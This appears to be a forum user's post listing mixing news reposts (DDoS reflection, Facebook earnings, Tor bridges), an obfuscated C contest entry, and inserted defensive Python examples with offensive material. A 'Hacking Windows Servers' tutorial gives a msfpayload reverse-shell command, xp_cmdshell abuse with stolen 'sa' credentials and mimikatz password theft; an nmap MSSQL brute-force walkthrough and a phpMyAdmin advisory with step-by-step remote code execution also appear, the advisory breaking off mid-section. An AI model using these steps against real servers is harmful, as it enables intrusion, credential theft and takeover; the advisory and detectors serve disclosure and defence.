Nytro

Everything posted by Nytro

  1. [h=1]Aging networking protocols abused in DDoS attacks[/h]
     [h=2]Printers, routers and many other Internet-connected devices can be used in an attack[/h]
     [h=3]By Jeremy Kirk[/h]

May 01, 2013 — IDG News Service — Aging networking protocols still employed by nearly every Internet-connected device are being abused by hackers to conduct distributed denial-of-service (DDoS) attacks.

Security vendor Prolexic found that attackers are increasingly using the protocols for what it terms "distributed reflection denial-of-service attacks" (DrDoS), where a device is tricked into sending a high volume of traffic to a victim's network.

"DrDoS protocol reflection attacks are possible due to the inherent design of the original architecture," Prolexic wrote in a white paper. "When these protocols were developed, functionality was the main focus, not security."

Government organizations, banks and companies are targeted by DDoS attacks for a variety of reasons. Hackers sometimes use DDoS attacks to draw attention away from other mischief, or want to disrupt an organization for political or philosophical reasons.

One of the targeted protocols, known as Network Time Protocol (NTP), is used in all major operating systems, network infrastructure and embedded devices, Prolexic wrote. It is used to synchronize clocks among computers and servers. A hacker can launch an attack against NTP by sending many requests for updates. By spoofing the origin of the requests, the NTP responses can be directed at a victim host. It appears the attackers are abusing a monitoring function in the protocol called NTP mode 7 (monlist). The gaming industry has been targeted by this style of attack, Prolexic said.

Other network devices, such as printers, routers, IP video cameras and a variety of other Internet-connected equipment, use an application layer protocol called Simple Network Management Protocol (SNMP). SNMP communicates data about device components, Prolexic wrote, such as measurements or sensor readings. SNMP devices return three times as much data as when they're pinged, making them an effective way to attack. Again, an attacker will send a spoofed IP request to an SNMP host, directing the response to a victim. Prolexic wrote there are numerous ways to mitigate an attack. The best advice is to disable SNMP if it is not needed.

The U.S. Computer Emergency Readiness Team warned administrators in 1996 of a potential attack scenario involving another protocol, Character Generator Protocol, or CHARGEN. It is used as a debugging tool since it sends data back regardless of the input. But Prolexic wrote that it "may allow attackers to craft malicious network payloads and reflect them by spoofing the transmission source to effectively direct it to a target. This can result in traffic loops and service degradation with large amounts of network traffic." CERT recommended at the time disabling any UDP (User Datagram Protocol) service such as CHARGEN if it isn't needed.

Sursa: Aging networking protocols abused in DDoS attacks - CSO Online - Security and Risk
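Added example (not part of the article above or of Prolexic's paper): a small Python classifier for the NTP mode 7 "monlist" traffic the article describes, run over constructed packets. The header layout follows ntpd's mode 7 request header (first byte: response and "more" flags, version, mode; then auth/sequence, implementation number, request code, and 12-bit item count and item size), and request codes 20 (REQ_MON_GETLIST) and 42 (REQ_MON_GETLIST_1) are the ones ntpd uses for the monitor list. The 8-byte probe, the zero-filled replies and the 600-entry monitor list are constructed here for illustration.

```python
"""Spot NTP mode 7 'monlist' reflection traffic and estimate the amplification.

Added example, not from the article. Packet layouts follow ntpd's mode 7
request header (ntp_request.h); every packet here is constructed in-line.
"""
from dataclasses import dataclass
from typing import List, Optional

REQ_MON_GETLIST = 20      # ntpd request codes that return the monitor list
REQ_MON_GETLIST_1 = 42
MONLIST_CODES = {REQ_MON_GETLIST, REQ_MON_GETLIST_1}
IMPL_XNTPD = 3            # implementation number used by ntpd

# The 8-byte probe an attacker spoofs: version 2, mode 7, impl 3, request 42.
MONLIST_PROBE = bytes.fromhex("1700032a") + bytes(4)


@dataclass
class Mode7Header:
    response: bool      # set on replies, clear on requests
    more: bool          # set when further reply packets follow
    version: int
    implementation: int
    request_code: int
    nitems: int         # low 12 bits of err_nitems
    item_size: int      # low 12 bits of mbz_itemsize


def parse_mode7(payload: bytes) -> Optional[Mode7Header]:
    """Decode the 8-byte mode 7 header; None if this is not a mode 7 packet."""
    if len(payload) < 8:
        return None
    b0 = payload[0]
    if b0 & 0x07 != 7:          # low 3 bits: NTP mode; 7 = private ("ntpdc") mode
        return None
    return Mode7Header(
        response=bool(b0 & 0x80),
        more=bool(b0 & 0x40),
        version=(b0 >> 3) & 0x07,
        implementation=payload[2],
        request_code=payload[3],
        nitems=int.from_bytes(payload[4:6], "big") & 0x0FFF,
        item_size=int.from_bytes(payload[6:8], "big") & 0x0FFF,
    )


def is_monlist(payload: bytes) -> bool:
    """True for a monlist request or reply, i.e. what a DrDoS detector should alert on."""
    hdr = parse_mode7(payload)
    return hdr is not None and hdr.request_code in MONLIST_CODES


def build_monlist_reply(nitems: int, more: bool, item_size: int = 72) -> bytes:
    """Constructed monlist reply: header plus nitems zero-filled 72-byte monitor entries."""
    b0 = 0x80 | (0x40 if more else 0) | (2 << 3) | 7
    header = (bytes([b0, 0x00, IMPL_XNTPD, REQ_MON_GETLIST_1])
              + (nitems & 0x0FFF).to_bytes(2, "big")
              + (item_size & 0x0FFF).to_bytes(2, "big"))
    return header + bytes(nitems * item_size)


def simulate_monlist_replies(total_entries: int, per_packet: int = 6) -> List[bytes]:
    """The monitor list comes back in chunks; 6 entries fill a 440-byte packet."""
    replies = []
    remaining = total_entries
    while remaining > 0:
        n = min(per_packet, remaining)
        remaining -= n
        replies.append(build_monlist_reply(n, more=remaining > 0))
    return replies


def amplification_factor(request: bytes, replies: List[bytes]) -> float:
    """Bytes delivered to the spoofed victim per byte the attacker sent."""
    return sum(len(r) for r in replies) / len(request)


if __name__ == "__main__":
    replies = simulate_monlist_replies(600)   # a server that saw 600 recent clients
    print("probe is monlist:", is_monlist(MONLIST_PROBE))
    print("reply packets:", len(replies),
          "amplification: %.0fx" % amplification_factor(MONLIST_PROBE, replies))
```

The detection signal is the mode bits plus the request code, not the port alone: legitimate NTP clients speak mode 3/4, so any mode 7 packet with request code 20 or 42 crossing the perimeter is worth an alert, and the reply-to-request byte ratio shows why a single spoofed 8-byte probe matters. On the server side the equivalent fix is `disable monitor` (or `restrict default noquery`) in ntp.conf.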
  2. [h=1]Facebook Q1 Earnings: Striking Mobile Revenue Growth[/h]

May 1st, 2013, 20:37 GMT · By Gabriela Vatu

Facebook has barely exceeded estimates and reported revenues of $1.458 billion (€1.105 billion) for the first quarter of 2013; it also announced a 54% increase in mobile revenues. The company has published its first quarterly results of 2013. Overall, Facebook's revenues exceeded the $1.44 billion (€1.09 billion) estimates of Wall Street specialists.

The social network also brought in over $751 million (€570 million) in mobile revenue in the first quarter, which is a 54% increase year-over-year. This has been extremely important to investors over the past year, so such an increase in this division is expected to cause a rise in Facebook's stock price.

Out of the company's overall result for the first three months, 85% came from advertising. Facebook has managed to garner $1.25 billion (€0.94 billion) by selling ads, which is 43% more than last year. Mobile ads also played an important part, as they represented 30% of the total ad revenue, which is above Wall Street expectations.

Facebook's net income for the first quarter was $219 million (€166 million), a small increase over last year's results, when it had profits of $205 million (€155 million). The social network giant also announced that it has cash and marketable securities of $9.5 billion (€7.2 billion) at the end of the quarter.

"We've made a lot of progress in the first few months of the year," Mark Zuckerberg, Facebook CEO, said at the conference. He continued by saying that they've seen strong growth and engagement across the community, as well as launched several exciting products.

Facebook's number of daily active users also increased by 26% over the last year, to 665 million on average in March. The number of monthly active users also grew significantly, reaching 1.11 billion. This represents a 23% increase over last year.

David Spillane, Facebook's Chief Accounting Officer, has announced that he will be leaving the company.

Sursa: Facebook Q1 Earnings: Striking Mobile Revenue Growth - Softpedia
  3. http://www.youtube.com/watch?v=ghC_UCavA5o&feature=share
  4. 242 rows affected. ( Query took 0.0078 sec )
  5. [h=3]Hacking Windows Servers - Privilege Escalation[/h]

Most of us here can hack websites and servers. But what we hate the most is an error message: Access Denied! We know some methods to bypass certain restrictions using symlinks, privilege escalation using local root exploits and some similar attacks. But these get the job done only on Linux servers. What about Windows servers? Here are some ways to bypass certain restrictions on Windows servers or to get SYSTEM privileges:

1. Using the "sa" account to execute commands by MSSQL query via the 'xp_cmdshell' stored procedure.
2. Using a meterpreter payload to get a reverse shell on the target machine.
3. Using browser_autopwn. (Really...)
4. Using other tools like pwdump7, mimikatz, etc.

Using the tools is an easy way, but the real fun of hacking lies in the first three methods I mentioned above.

1. Using xp_cmdshell

Most of the time on Windows servers we have read permission over the files of other IIS users, which is needed to make this method work. If we are lucky enough, we will find login credentials of the "sa" account of the MSSQL server inside the web.config file of some website. You must be wondering why only "sa"? Here, "sa" stands for Super Administrator and, as the name tells, this user has all possible permissions over the server. The picture below shows the connection string containing the login credentials of the "sa" account.

Using this, we can log into the MSSQL server locally (using our web backdoor) as well as remotely. I would recommend remote access because it does not generate webserver logs, which would fill the log file with our web backdoor path. So, after getting the "sa" account, we can log in remotely using HeidiSQL. HeidiSQL is an awesome tool to connect to remote database servers. You can download it here. After logging into the MSSQL server with the sa account, we get a list of databases and their contents. Now we can execute commands using MSSQL queries via xp_cmdshell (with administrator privileges). Syntax for the query is:

xp_cmdshell '[command]'

For example, if I need to know my current privileges, I would query:

xp_cmdshell 'whoami'

This shows that I am currently NT Authority/System, which most of us know is the highest user in the Windows user hierarchy. Now we can go for some post exploitation like enabling RDP, adding accounts and allowing them to access RDP.

Note: If the server does not have the xp_cmdshell stored procedure, you can install it yourself. There are many tutorials for that online.

2. Meterpreter Payload

This method is quite easy and comes in useful when we cannot read files of other users but we can execute commands. Using metasploit, generate a reverse shell payload binary. For example:

msfpayload windows/shell_reverse_tcp LHOST=172.16.104.130 LPORT=31337 X > /tmp/1.exe

Now we will upload this executable to the server using our web backdoor. Run the multi/handler module at our end. (Make sure the ports are forwarded properly.) Now it's time to execute the payload. If everything goes right, we will get a meterpreter session on the target machine as shown below. We can also use php, asp or other payloads.

3. Browser Autopwn

This seems odd as a way of hacking a server. But I myself found this a clever way to do the job, especially in scenarios where we are allowed to execute commands but cannot run executables (our payloads) due to software restriction policies in a domain environment. Most Windows servers have an outdated Internet Explorer, and we can exploit them if we can execute commands. I think it is clear by now what I'm trying to explain. We can start Internet Explorer from the command line and make it browse to a specific URL. Syntax for this:

iexplore.exe <URL>

where URL is our server address, which is running browser_autopwn. After that we can use railgun to avoid antivirus detection.

4. Using readily available tools

Tools like pwdump and mimikatz can crack passwords of Windows users.

#pwdump7 gives out the NTLM hashes of the users, which can be cracked further using John the Ripper. The following screenshot shows NTLM hashes from pwdump7.

#mimikatz is another great tool which extracts the plain text passwords of users from lsass.exe. The tool is in some language other than English, so do watch tutorials on how to use it. The following picture shows plain text passwords from mimikatz.

You can google them and learn how to use these tools and what they actually exploit to get the job done for you. I hope you can now exploit every other Windows server. Happy Hacking!

About The Author: This article has been written by Deepankar Arora. He is an independent security researcher from India and has been listed in various halls of fame.

Sursa: Hacking Windows Servers - Privilege Escalation | Learn How To Hack - Ethical Hacking and security tips
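Added example (not from the post above, and not the author's own tooling): the post's first method hinges on a readable web.config that carries the "sa" login in its connection string. The Python below audits an ASP.NET web.config for exactly that, the same check a defender would run across a web tier, and shows why a section protected with `aspnet_regiis -pe connectionStrings` gives a web shell nothing to read. The two web.config documents are constructed samples; the connection-string keys (`User ID`/`Uid`, `Password`/`Pwd`, `Integrated Security`) are the standard ADO.NET ones.

```python
"""Audit an ASP.NET web.config for MSSQL connection strings that hand out 'sa'.

Added example, not from the post. SAMPLE_WEB_CONFIG and
SAMPLE_PROTECTED_WEB_CONFIG are constructed; the ADO.NET connection-string
keys are the standard ones.
"""
import xml.etree.ElementTree as ET
from dataclasses import dataclass
from typing import Dict, List, Optional

SAMPLE_WEB_CONFIG = """<?xml version="1.0"?>
<configuration>
  <connectionStrings>
    <add name="ShopDb"
         connectionString="Data Source=SQL01;Initial Catalog=shop;User ID=sa;Password=Summer2013!;"
         providerName="System.Data.SqlClient" />
    <add name="Reports"
         connectionString="Server=SQL01;Database=reports;Integrated Security=SSPI;"
         providerName="System.Data.SqlClient" />
  </connectionStrings>
</configuration>
"""

# The same section after `aspnet_regiis -pe connectionStrings`: only ciphertext
# is on disk, so read access to the file yields no credentials (constructed, abbreviated).
SAMPLE_PROTECTED_WEB_CONFIG = """<?xml version="1.0"?>
<configuration>
  <connectionStrings configProtectionProvider="RsaProtectedConfigurationProvider">
    <EncryptedData>...</EncryptedData>
  </connectionStrings>
</configuration>
"""

USER_KEYS = ("user id", "uid", "user")          # ADO.NET synonyms, case-insensitive
PASSWORD_KEYS = ("password", "pwd")
INTEGRATED_KEYS = ("integrated security", "trusted_connection")


@dataclass
class Finding:
    name: str
    user: Optional[str]
    uses_sa: bool                # sysadmin login: xp_cmdshell is one query away
    plaintext_password: bool
    integrated_security: bool    # Windows auth, so no secret sits in the file


def parse_connection_string(cs: str) -> Dict[str, str]:
    """'Key=Value;Key=Value' -> dict with lower-cased keys."""
    out: Dict[str, str] = {}
    for part in cs.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            out[key.strip().lower()] = value.strip()
    return out


def audit_web_config(xml_text: str) -> List[Finding]:
    """One Finding per <add> entry; a protected (encrypted) section yields none."""
    root = ET.fromstring(xml_text)
    section = root.find("connectionStrings")
    if section is None or section.get("configProtectionProvider"):
        return []
    findings = []
    for add in section.findall("add"):
        kv = parse_connection_string(add.get("connectionString", ""))
        user = next((kv[k] for k in USER_KEYS if k in kv), None)
        integrated = any(kv.get(k, "").lower() in ("sspi", "true", "yes")
                         for k in INTEGRATED_KEYS)
        findings.append(Finding(
            name=add.get("name", "?"),
            user=user,
            uses_sa=user is not None and user.lower() == "sa",
            plaintext_password=any(k in kv for k in PASSWORD_KEYS),
            integrated_security=integrated,
        ))
    return findings


def high_risk(findings: List[Finding]) -> List[str]:
    """Names of entries that expose a reusable SQL login in clear text."""
    return [f.name for f in findings
            if f.plaintext_password and not f.integrated_security]


if __name__ == "__main__":
    for f in audit_web_config(SAMPLE_WEB_CONFIG):
        print(f)
    print("high risk:", high_risk(audit_web_config(SAMPLE_WEB_CONFIG)))
    print("protected file:", audit_web_config(SAMPLE_PROTECTED_WEB_CONFIG))
```

Run it against every web.config on a shared IIS host and the "ShopDb" style entries are the ones that turn a low-privilege web shell into xp_cmdshell. The fixes are the mirror image of the attack: a dedicated low-privilege SQL login or Windows authentication instead of sa, and protected configuration so the file is useless when it is readable.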
  6. [h=1]Tor calls for help as its supply of bridges falters[/h]
     [h=2]Bridges help users in countries like China and Iran access the network.[/h]

by Sean Gallagher - Apr 17 2013, 7:23pm GTBDT

Just like the US highway infrastructure, Tor needs new bridges. The encrypted anonymizing "darknet" that allows activists, journalists, and others to access the Internet without fear of censorship or monitoring—and which has also become a favored technology of underground groups like child pornographers—is having increasing difficulty serving its users in countries that have blocked access to Tor's entry points.

Tor bridges are computers that act as hidden gateways to Tor's darknet of relays. After campaigning successfully last year to get more volunteers to run obfuscated Tor bridges to support users in Iran trying to evade state monitoring, the network has lost most of those bridges, according to a message to the Tor relays mailing list by Tor volunteer George Kadianakis. "Most of those bridges are down, and fresh ones are needed more than ever," Kadianakis wrote in an e-mail, "since obfuscated bridges are the only way for people to access Tor in some areas of the world (like China, Iran, and Syria)."

Obfuscated bridges allow users to connect to the Tor network without using one of the network's known public bridges or relays as an initial entry point. Obfuscated bridges have become a necessity for Tor users in countries with networks guarded by various forms of deep packet inspection technology, where censors have put in place filters that spot traffic matching the signature of a Tor-protected connection. Some of these censors use a blocking list for traffic to known Tor bridges. To circumvent detection, Tor users can use a plugin called a "pluggable transport" to connect to an obfuscated bridge and mask their network signature.

To further evade potential censoring, the addresses for obfuscated bridges are not part of Tor's main directory but are stored in a distributed database called BridgeDB. The BridgeDB's interface spoons out addresses two at a time per request in an effort to prevent attacks to expose a full list, and no BridgeDB instance keeps a full list of the available bridges. Additionally, Tor provides "unpublished" bridge addresses to users who request them via e-mail. The Tor Project's support assistants—volunteers who respond to support requests—only respond to requests sent from Gmail and Yahoo e-mail accounts, both to deal with the flood of requests and to reduce the chance that an attacker will be able to learn the addresses of a large number of bridges.

The problem for Tor is that those bridges do get detected by attackers over time, and pluggable transports can eventually be detected. The most widely used pluggable transport in the Tor network, obfs2, no longer works in China. A new plugin, obfs3, will work in China, but it runs only on the latest version of the obfuscated bridge proxy—which was recently rewritten in Python. "Looking into BridgeDB," Kadianakis wrote in his message to the Tor community, "we have 200 obfs2 bridges, but only 40 obfs3 bridges: this means that we need more people running the new Python obfsproxy! Upgrading obfsproxy should be easy now, since we prepared new instructions and Debian/Ubuntu packages." He added that there is also a particular need for more unpublished bridges.

For those who want to donate bridges to the Tor network, the easiest route is to use Tor Cloud, an Amazon Web Services Elastic Compute Cloud image created by the Tor Project that allows people to leverage Amazon's free usage tier to deploy a bridge.

Sursa: http://arstechnica.com/information-technology/2013/04/tor-calls-for-help-as-its-supply-of-bridges-falters/
  7. [C] Love letter (obfuscated C contest 1990)

char*lie;

    double time, me= !0XFACE,
    not; int rested,   get, out;
    main(ly, die) char ly, **die ;{
        signed char lotte,


dear; (char)lotte--;
    for(get= !me;; not){
    1 -  out & out ;lie;{
    char lotte, my= dear,
    **let= !!me *!not+ ++die;
        (char*)(lie=
    "The gloves are OFF this time, I detest you, snot\n\0sed GEEK!");
    do {not= *lie++ & 0xF00L* !me;
    #define love (char*)lie -
    love 1s *!(not= atoi(let
    [get -me?
        (char)lotte-

(char)lotte: my- *love -
    'I'  -  *love -  'U' -
    'I'  -  (long)  - 4 - 'U' ])- !!
    (time  =out=  'a'));} while( my - dear
    && 'I'-1l  -get-  'a'); break;}}
    (char)*lie++;

    (char)*lie++, (char)*lie++; hell:0, (char)*lie;
    get *out* (short)ly   -0-'R'-  get- 'a'^rested;
    do {auto*eroticism,
    that; puts(*( out
        - 'c'
    -('P'-'S') +die+ -2 ));}while(!"you're at it");

for (*((char*)&lotte)^=
    (char)lotte; (love ly) [(char)++lotte+
    !!0xBABE];){ if ('I' -lie[ 2 +(char)lotte]){ 'I'-1l ***die; }
    else{ if ('I' * get *out* ('I'-1l **die[ 2 ])) *((char*)&lotte) -=
    '4' - ('I'-1l); not; for(get=!
    get; !out; (char)*lie  &  0xD0- !not) return!!
        (char)lotte;}

(char)lotte;
    do{ not* putchar(lie [out
    *!not* !!me +(char)lotte]);
    not; for(;!'a';);}while(
        love (char*)lie);{

register this; switch( (char)lie
    [(char)lotte] -1s *!out) {
    char*les, get= 0xFF, my; case' ':
    *((char*)&lotte) += 15; !not +(char)*lie*'s';
    this +1s+ not; default: 0xF +(char*)lie;}}}
    get - !out;
    if (not--)
    goto hell;
        exit( (char)lotte);}

Sursa: http://www0.us.ioccc.org/1990/westley.c

PS: You may get an error about an invalid suffix "s". Replace that "s" with "L" or "5".
  8. Pen Testing SQL Servers With Nmap

The Nmap Scripting Engine has transformed Nmap from a regular port scanner into a penetration testing machine. With the variety of scripts that exist so far, we can even perform a full penetration test of an SQL database without the need for any other tool. In this tutorial we will have a look at these scripts, what kind of information they extract from the database, and how we can exploit the SQL server and execute system commands through Nmap.

Most SQL databases run on port 1433, so in order to discover information regarding the database we need to execute the following script:

Obtain SQL Information – Nmap

So we already have the database version and the instance name. The next step is to check whether there is a weak password for authentication with the database. In order to achieve that we need to run the following nmap script, which will perform a brute force attack.

Brute Force Weak MS-SQL Accounts – Nmap

As we can see, in this case we didn't discover any credentials. If we want, we can use this script with our own username and password lists in order to discover a valid database account with this command:

nmap -p1433 --script ms-sql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt

However, we can always try another script which checks for the existence of null passwords on Microsoft SQL Servers.

Check For Null passwords on SA accounts – Nmap

Now we know that the sa account has no password. We can use this information to connect to the database directly or to continue executing further Nmap scripts that require valid credentials. If we want to know which databases the sa account (or any other account that we have discovered) has access to, we can run the ms-sql-hasdbaccess script with the following arguments:

Discover which user has access to which db – Nmap

We can even query the Microsoft SQL Server via Nmap in order to obtain the database tables.

List Tables – Nmap

In the 2000 version of SQL Server xp_cmdshell is enabled by default, so we can even execute operating system commands through Nmap scripts, as can be seen in the images below:

Run OS command via xp_cmdshell – Nmap
Run net users via xp_cmdshell – Nmap

Last but not least, we can run a script to extract the database password hashes for cracking with tools like John the Ripper.

Dump MS-SQL hashes – Nmap

In this case we didn't have any hashes because there was only one account on the database, the sa, which has a null password.

Sursa: Pen Testing SQL Servers With Nmap | Penetration Testing Lab
  9. PeStudio 6.70

Author: Marc Ochsenmeier
Author email: info@winitor.com
Author website: winitor
Description: PeStudio is a free tool which can be used to perform static analysis of any Windows application and reveals not only raw data but also Indicators of Trust. Executable files analyzed with PeStudio are never started. For this reason, you can analyze suspicious applications with PeStudio with no risk! Depending on how it is started, PeStudio has a Graphical User Interface (GUI) or a Character-Based User Interface (CUI), which is especially useful when performing batch-mode parsing of executable files. PeStudio has a set of unique features like looking up the image being analyzed on VirusTotal and the possibility to start new instances of PeStudio with the dependencies of the image. PeStudio accesses the data of the Windows Portable Executable format directly; no Windows API is used to gather elements. Another feature unique to PeStudio is the ability to create an XML report of the image being analyzed.
Filesize: 380 kB
Date: Tuesday 23 April 2013 - 08:56:45
Downloads: 86

Sursa: PeStudio 6.70 / Portable Executable Tools / Downloads - Tuts 4 You
  10. [h=1]phpMyAdmin 3.5.8 and 4.0.0-RC2 - Multiple Vulnerabilities[/h]

[waraxe-2013-SA#103] - Multiple Vulnerabilities in phpMyAdmin
===============================================================================

Author: Janek Vind "waraxe"
Date: 25. April 2013
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-103.html

Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
phpMyAdmin is a free software tool written in PHP, intended to handle the
administration of MySQL over the World Wide Web. phpMyAdmin supports a wide
range of operations with MySQL.

http://www.phpmyadmin.net/home_page/index.php

###############################################################################
1. Remote code execution via preg_replace() in "libraries/mult_submits.inc.php"
###############################################################################

Reason:
1. insufficient sanitization of user data before use in preg_replace

Attack vectors:
1. user-supplied parameters "from_prefix" and "to_prefix"

Preconditions:
1. logged in as valid PMA user
2. PHP version < 5.4.7 (newer versions: Warning: preg_replace(): Null byte in regex)

PMA security advisory: PMASA-2013-2
CVE id: CVE-2013-3238
Affected phpMyAdmin versions: 3.5.8 and 4.0.0-RC2

Result: PMA user is able to execute arbitrary PHP code on webserver

Let's take a look at the source code:

Php script "libraries/mult_submits.inc.php" line 426 (PMA version 3.5.8):
------------------------[ source code start ]----------------------------------
            case 'replace_prefix_tbl':
                $current = $selected[$i];
                $newtablename = preg_replace("/^" . $from_prefix . "/", $to_prefix, $current);
                $a_query = 'ALTER TABLE '
                    . PMA_backquote($selected[$i])
                    . ' RENAME '
                    . PMA_backquote($newtablename);
                // CHANGE PREFIX PATTERN
                $run_parts = true;
                break;

            case 'copy_tbl_change_prefix':
                $current = $selected[$i];
                $newtablename = preg_replace("/^" . $from_prefix . "/", $to_prefix, $current);
                $a_query = 'CREATE TABLE '
                    . PMA_backquote($newtablename)
                    . ' SELECT * FROM '
                    . PMA_backquote($selected[$i]);
                // COPY TABLE AND CHANGE PREFIX PATTERN
                $run_parts = true;
                break;
------------------------[ source code end ]------------------------------------

We can see that the PHP variables "$from_prefix" and "$to_prefix" are used in
the preg_replace function without any sanitization. It appears that those
variables come from a user-submitted POST request as parameters "from_prefix"
and "to_prefix". It is possible to inject the e-modifier with a terminating
null byte via the first parameter and PHP code via the second parameter. In
case of successful exploitation the injected PHP code will be executed on the
PMA webserver.

Tests:
1. Log in to PMA and select database:
   http://localhost/PMA/index.php?db=test&token=25a6ce9e288070bd28c3f9aebffad1b8
2. Select one table from the database using its checkbox, then select
   "Replace table prefix" from the "With selected:" select control.
3. We can see a form named "Replace table prefix:" with two input fields.
   Type "/e%00" into the "From" field and "phpinfo()" into the "To" field.
4. Activate the Tamper Data Firefox add-on:
   https://addons.mozilla.org/en-us/firefox/addon/tamper-data/
5. Click "Submit"; Tamper Data pops up, choose "Tamper".
6. Now we can modify the POST request. Look for parameter "from_prefix". It
   should be "%2Fe%2500"; remove the "25" so that it becomes "%2Fe%00". Click
   "OK" and Firefox will send out the manipulated POST request.
7. We are greeted by phpinfo function output - code execution is confirmed.

PMA version 4.0.0-RC2 contains an almost identical vulnerability:

Php script "libraries/mult_submits.inc.php" line 482 (PMA version 4.0.0-RC2):
------------------------[ source code start ]----------------------------------
            case 'replace_prefix_tbl':
                $current = $selected[$i];
                $newtablename = preg_replace("/^" . $_POST['from_prefix'] . "/", $_POST['to_prefix'], $current);
                $a_query = 'ALTER TABLE '
                    . PMA_Util::backquote($selected[$i])
                    . ' RENAME '
                    . PMA_Util::backquote($newtablename);
                // CHANGE PREFIX PATTERN
                $run_parts = true;
                break;

            case 'copy_tbl_change_prefix':
                $current = $selected[$i];
                $newtablename = preg_replace("/^" . $_POST['from_prefix'] . "/", $_POST['to_prefix'], $current);
                $a_query = 'CREATE TABLE '
                    . PMA_Util::backquote($newtablename)
                    . ' SELECT * FROM '
                    . PMA_Util::backquote($selected[$i]);
                // COPY TABLE AND CHANGE PREFIX PATTERN
                $run_parts = true;
                break;
------------------------[ source code end ]------------------------------------

############################################################################
2. Locally Saved SQL Dump File Multiple File Extension Remote Code Execution
############################################################################

Reason:
1. insecure names of locally saved dump files

Attack vectors:
1. user-supplied POST parameter "filename_template"

Preconditions:
1. logged in as valid PMA user
2. configuration setting "SaveDir" defined and pointed to a directory which is
   writable for PHP and directly accessible over the web (by default "SaveDir"
   is empty and PMA is secure)
3. Apache webserver with unknown MIME type for the "sql" extension

PMA security advisory: PMASA-2013-3
CVE id: CVE-2013-3239
Affected are PMA versions 3.5.8 and 4.0.0-RC2

There is a security weakness in the way PMA handles locally saved database
dump files. It is possible that a saved dump file has multiple extensions, and
if the Apache webserver does not know the MIME type of the "sql" extension
(that's how it is by default), then for example a "foobar.php.sql" file will be
treated as a PHP file.

More information:
http://httpd.apache.org/docs/2.2/mod/mod_mime.html
  section "Files with Multiple Extensions"
http://www.acunetix.com/websitesecurity/upload-forms-threat/
  section "Case 4: Double extensions (part 1)"

Test:
1. Activate export to the local server, and be sure that the directory is
   writable:
   $cfg['SaveDir'] = './';
2. Select a database for the test, insert a row into a table with PHP code
   included, like "<?php phpinfo();?>".
3. Try to export that database or table; you now have an additional option:
   "Save on server in the directory ./". Confirm that option, let the format
   be "SQL", change "File name template" to "@DATABASE () php" and click the
   "Go" button. The server responds with "Dump has been saved to file
   ./test.php.sql."
4. Request the created file with a web browser:
   http://localhost/PMA/test.php.sql
   In case of success we can see the output of the phpinfo() function, which
   confirms remote code execution.

###############################################################################
3. Local File Inclusion in "export.php"
###############################################################################

Reason:
1. insufficient sanitization of user data before use in include_once

Attack vectors:
1. user-supplied POST parameter "what"

Preconditions:
1. logged in as valid PMA user
2. PHP must be < 5.3.4 for null-byte attacks to work

PMA security advisory: PMASA-2013-4
CVE id: CVE-2013-3240
Affected is PMA version 4.0.0-RC2

Php script "export.php" line 20:
------------------------[ source code start ]----------------------------------
foreach ($_POST as $one_post_param => $one_post_value) {
    $GLOBALS[$one_post_param] = $one_post_value;
}

PMA_Util::checkParameters(array('what', 'export_type'));

// export class instance, not array of properties, as before
$export_plugin = PMA_getPlugin(
    "export",
    $what,
    'libraries/plugins/export/',
    array(
        'export_type' => $export_type,
        'single_table' => isset($single_table)
    )
);
------------------------[ source code end ]------------------------------------

We can see that the user-supplied parameter "what" is used as the second
argument of the function PMA_getPlugin(). Let's follow the execution flow:

Php script "libraries/plugin_interface.lib.php" line 20:
------------------------[ source code start ]----------------------------------
function PMA_getPlugin(
    $plugin_type,
    $plugin_format,
    $plugins_dir,
    $plugin_param = false
) {
    $GLOBALS['plugin_param'] = $plugin_param;
    $class_name = strtoupper($plugin_type[0])
        . strtolower(substr($plugin_type, 1))
        . strtoupper($plugin_format[0])
        . strtolower(substr($plugin_format, 1));
    $file = $class_name . ".class.php";
    if (is_file($plugins_dir . $file)) {
        include_once $plugins_dir . $file;
------------------------[ source code end ]------------------------------------

As seen above, the second argument "$plugin_format" is used in the variable
"$file" and after that in the functions is_file() and include_once(). No
sanitization is applied to the user-submitted parameter "what", which leads to
a directory traversal and local file inclusion vulnerability. With an older PHP
version it may be possible to use a null byte attack and include arbitrary
files on the server.

###############################################################################
4. $GLOBALS array overwrite in "export.php"
###############################################################################

Reason:
1. insecure importing of POST parameters

Attack vectors:
1. user-supplied POST parameters

Preconditions:
1. logged in as valid PMA user

PMA security advisory: PMASA-2013-5
CVE id: CVE-2013-3241
Affected is PMA version 4.0.0-RC2

Php script "export.php" line 20:
------------------------[ source code start ]----------------------------------
foreach ($_POST as $one_post_param => $one_post_value) {
    $GLOBALS[$one_post_param] = $one_post_value;
}

PMA_Util::checkParameters(array('what', 'export_type'));
------------------------[ source code end ]------------------------------------

We can see that arbitrary values in the $GLOBALS array can be overwritten by
submitting POST parameters. Such a way of importing input data can be
considered very insecure, and in specific situations it is possible to
overwrite any variable in the global scope. This can lead to many ways of
exploitation. Below is one of the possibilities.

Php script "export.php" line 59:
------------------------[ source code start ]----------------------------------
$onserver = false;
$save_on_server = false;
...
if ($quick_export) {
    $onserver = $_REQUEST['quick_export_onserver'];
} else {
    $onserver = $_REQUEST['onserver'];
}
// Will we save dump on server?
$save_on_server = ! empty($cfg['SaveDir']) && $onserver;
...
// Open file on server if needed
if ($save_on_server) {
    $save_filename = PMA_Util::userDir($cfg['SaveDir'])
        . preg_replace('@[/\\\\]@', '_', $filename);
    ...
    if (! $file_handle = @fopen($save_filename, 'w')) {
        $message = PMA_Message::error(
...
/* If we saved on server, we have to close file now */
if ($save_on_server) {
    $write_result = @fwrite($file_handle, $dump_buffer);
    fclose($file_handle);
------------------------[ source code end ]------------------------------------

As seen above, when the configuration setting "SaveDir" is set, it is possible
to save a database dump to the PMA webserver. By default "SaveDir" is unset,
and this prevents possible security problems. As we can overwrite any variable
in the global scope, it is possible to set "SaveDir" to an arbitrary value.
This leads to a directory traversal vulnerability: the attacker is able to save
a database dump to any directory on the webserver, if only the filesystem
permissions allow that. The database dump can have the extension ".sql". If
the attacker can dump a database with PHP code and tags in it, this content
will be in the dump file. If the filename is something like "foobar.php.sql",
then by default most Apache webserver installations will try to parse this
dump file as a PHP file, which can finally lead to remote code execution.

Disclosure timeline:
